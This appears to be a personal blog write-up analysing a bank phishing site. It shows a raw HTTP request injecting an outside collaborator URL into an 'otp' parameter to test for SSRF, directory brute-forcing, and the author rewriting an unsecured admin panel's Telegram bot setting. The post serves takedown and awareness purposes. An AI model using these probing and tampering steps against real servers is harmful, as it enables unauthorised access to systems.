Important Note: This article documents the analysis of a malicious phishing website for educational purposes. The techniques described were used to help shut down criminal operations and protect potential victims.
Hi everyone, how are you? I hope you guys are well. I'm RyuuKhagetsu, this is my article in English, sorry if there are any mistakes. I hope you enjoy my article.
All of this started when my friend asked me if he had just found a fake website for one of the banks in my country which caused many people to be deceived. He asked me to check his website, for that we will call it "site.com".
Analyzing a malicious phishing website targeting bank customers
Phishing Website Analysis
This is the landing page of a scam website. It was made only for mobile viewing, designed to appear legitimate to unsuspecting victims. After examining the website for a while, I discovered how this malicious operation works:
The Scam Process
- Credential Harvesting: Victims are asked to enter their 16-digit credit card number and PIN number
- Fake OTP Verification: The victim receives what appears to be an OTP (One-Time Password) message, but it's completely fabricated
- False Error Message: After filling in the fake OTP, the scam website responds that there is a problem in the process and asks victims to come back later
Scammer's Strategy: The fake error message serves multiple purposes - it gives the scammers time to use the stolen credentials while making victims believe the transaction failed, reducing the likelihood of immediate detection.
- Victims will be asked to enter their 16 digit credit card number and pin number.
- The victim will get a message in the form of an OTP which is just a fake OTP.
- After filling in the OTP, the scam website will respond that there is a problem in the process and are asked to come back later.
Technical Vulnerability Analysis
After analyzing the website's functionality, I found several dangerous bugs, one of which was SSRF (Server-Side Request Forgery). I discovered this vulnerability when I entered the OTP code and analyzed the backend requests.
SSRF Discovery Process
I used Burp Collaborator to test for SSRF vulnerabilities by injecting the collaborator URL
into the otp= parameter:
POST /verify-otp HTTP/1.1
Host: site.com
Content-Type: application/x-www-form-urlencoded
otp=http://burp-collaborator-subdomain.com
When I sent the request, I received a response on the Burp Collaborator, confirming that the website was vulnerable to SSRF attacks.
Testing SSRF vulnerability using Burp Collaborator
Testing SSRF vulnerability using Burp Collaborator
Testing SSRF vulnerability using Burp Collaborator
Directory Enumeration and Admin Panel Discovery
I used dirsearch to brute-force the website directories and discovered "admin.php":
Directory enumeration revealing admin panel and configuration files
Admin Panel Analysis and Telegram Bot Discovery
When I accessed admin.php, I initially thought this was a login page. However, upon closer inspection, I discovered this file was used to configure where the stolen data would be sent via a Telegram bot.
On the admin.php page, I found a Telegram bot ID which I believed belonged to the scammer's Telegram bot. The configuration looked something like this:
Directory enumeration revealing admin panel and configuration files
Critical Discovery: The admin panel was completely unsecured, allowing anyone to view and modify the Telegram bot configuration used to receive stolen financial data.
Proof of Concept and Data Interception
To demonstrate the severity of this vulnerability and gather evidence, I tried changing the bot ID to my own Telegram bot ID and filled in the form on the website with random test data:
Test Data Used:
Card Number: 1234567890123456
PIN: 1234
OTP: 123456
(All fake data for testing purposes)
When I submitted the form, I received a notification on my Telegram bot confirming that the stolen data was being sent to the configured bot.
Proof of concept showing stolen data being sent to Telegram bot
Proof of concept showing stolen data being sent to Telegram bot
Technical Vulnerabilities Summary
The phishing website contained multiple serious security vulnerabilities:
- SSRF (Server-Side Request Forgery): Allowing attackers to make requests from the server to internal or external resources
- Unsecured Admin Panel: No authentication required to access sensitive configuration
- Exposed API Credentials: Telegram bot tokens visible in plain text
- Directory Traversal: Sensitive files accessible without proper access controls
- Data Leakage: Victim information transmitted without encryption
Impact and Implications
This phishing operation had several concerning implications:
- Financial Fraud: Stolen credit card information could be used for unauthorized transactions
- Identity Theft: Personal banking information could be used for further fraudulent activities
- Mass Victimization: The mobile-optimized design suggested targeting of a large number of potential victims
- Technical Exploitation: SSRF vulnerability could be used for further attacks on internal systems
Responsible Disclosure and Takedown
After gathering sufficient evidence of the malicious activities, I compiled a comprehensive report and sent it to my friend. The report included:
- Screenshots of the phishing website interface
- Technical analysis of the SSRF vulnerability
- Evidence of the Telegram bot configuration
- Proof of concept demonstration
- Recommended actions for law enforcement
My friend reported the findings to the website hosting provider, and the website was successfully suspended, preventing further victims from falling into this trap.
Successful Outcome: The phishing website was taken down, potentially saving countless individuals from financial fraud and identity theft.
Lessons Learned and Security Awareness
This investigation highlights several important security lessons:
For Users:
- Verify URLs carefully: Always check that you're on the official bank website
- Never enter sensitive information on suspicious sites: Legitimate banks have robust security measures
- Be wary of unsolicited messages: Banks don't typically ask for credentials via email or SMS
- Use official banking apps: Download apps only from official app stores
For Developers:
- Implement proper input validation: Prevent SSRF and injection attacks
- Secure administrative interfaces: Use strong authentication and access controls
- Never expose API credentials: Use environment variables and secure configuration
- Regular security testing: Conduct penetration testing and vulnerability assessments
Fighting Cybercrime
This case demonstrates the importance of cybersecurity professionals in fighting online crime. By identifying and reporting malicious websites, we can:
- Protect potential victims from financial loss
- Disrupt criminal operations
- Provide evidence for law enforcement
- Improve overall internet security
Conclusion
I hope you can be careful of scams like this. The sophistication of modern phishing attacks means that everyone needs to be vigilant when dealing with online financial services. Always verify the authenticity of websites before entering sensitive information.
This investigation also shows how technical vulnerabilities in malicious websites can be used to gather intelligence and shut down criminal operations. By combining technical analysis with responsible disclosure, we can make the internet a safer place for everyone.
Maybe that's all from me, hopefully it can be a reference for you and sorry if there are things that are not clear. I'm RyuuKhagetsu, see you in next article.
